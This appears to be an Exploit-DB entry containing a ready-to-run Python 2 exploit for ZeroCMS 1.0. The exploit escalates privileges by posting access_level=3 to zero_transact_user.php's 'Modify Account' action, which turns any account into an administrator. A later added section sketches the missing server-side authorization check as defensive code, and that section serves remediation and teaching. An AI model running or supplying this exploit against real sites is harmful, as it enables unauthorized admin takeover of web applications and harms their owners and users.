
[webapps] - ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation

2014-06-14 01:20
import sys,getopt,cookielib,urllib2,urllib

# ZeroCMS 1.0
# zero_transact_user.php
# Improper form post handling (parameter pollution)
# Vendor: Another Awesome Stuff
# Product web page: http://www.aas9.in/zerocms/
# author: tiago.alexand@gmail.com
# Tested on: php 5.4.27
# OSVDB ID: 108025
# description
# Summary: ZeroCMS is a very simple Content Management
# System built using PHP and MySQL.
# The script zero_transact_user.php contains a Modify Account case
# where the execution context does not take into consideration the current user's permissions,
# allowing a malicious user to escalate their privileges to admin.

def exploit(host,email,name,userid):
    access_level = 3 # default for admin
    url = host + '/zero_transact_user.php' # the script handles user related actions
    args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
    data = urllib.urlencode(args)
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    response = opener.open(url,data)
    print response.read()

def main(argv):
    host = ''
    email = ''
    accountname = ''
    userid = ''
    try:
        opts, args = getopt.getopt(argv,"hu:m:n:i:")
    except getopt.GetoptError:
        print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
            sys.exit()
        elif opt == "-u":
            host = arg
        elif opt == "-m":
            email = arg
        elif opt == "-n":
            accountname = arg
        elif opt == "-i":
            userid = arg
    exploit(host,email,accountname,userid)

if __name__ == "__main__":
    main(sys.argv[1:])



Source: www.exploit-db.com/exploits/33743
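
The permission check that the script's header comments describe as missing from the Modify Account case, sketched as server-side logic. This is an added example, not code from ZeroCMS or from the exploit author: the session layout, the function and exception names and the set of valid levels are assumptions, while the form field names and admin level 3 are the ones used in the script above.

```python
ADMIN_LEVEL = 3  # admin level as stated in the script above
VALID_LEVELS = (1, 2, 3)  # assumed range; the page only names 3
SELF_EDITABLE = ("email", "name")  # fields a user may change on their own account


class Forbidden(Exception):
    """The request asks for a change this session may not make."""


def authorize_modify_account(session, post):
    """Return (target_user_id, updates) or raise Forbidden.

    session: server-side state (hypothetical layout), e.g. {"user_id": 7, "access_level": 1}
    post:    untrusted form fields from the request body
    """
    if not session or "user_id" not in session:
        raise Forbidden("not logged in")
    is_admin = session.get("access_level") == ADMIN_LEVEL

    # Identity comes from the session; a posted user_id is honoured only for admins.
    target = str(post.get("user_id", session["user_id"]))
    if target != str(session["user_id"]) and not is_admin:
        raise Forbidden("cannot modify another account")

    updates = {k: post[k] for k in SELF_EDITABLE if k in post}

    if "access_level" in post:
        # Reject rather than silently drop, so the attempt can be logged.
        if not is_admin:
            raise Forbidden("access_level change requires admin")
        try:
            level = int(post["access_level"])
        except (TypeError, ValueError):
            raise Forbidden("invalid access_level")
        if level not in VALID_LEVELS:
            raise Forbidden("invalid access_level")
        updates["access_level"] = level
    return target, updates
```

The handler would call this before touching the database and write only the returned `updates` to the returned account, so a posted `access_level` or `user_id` never reaches the UPDATE statement unless the session itself is an admin session.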
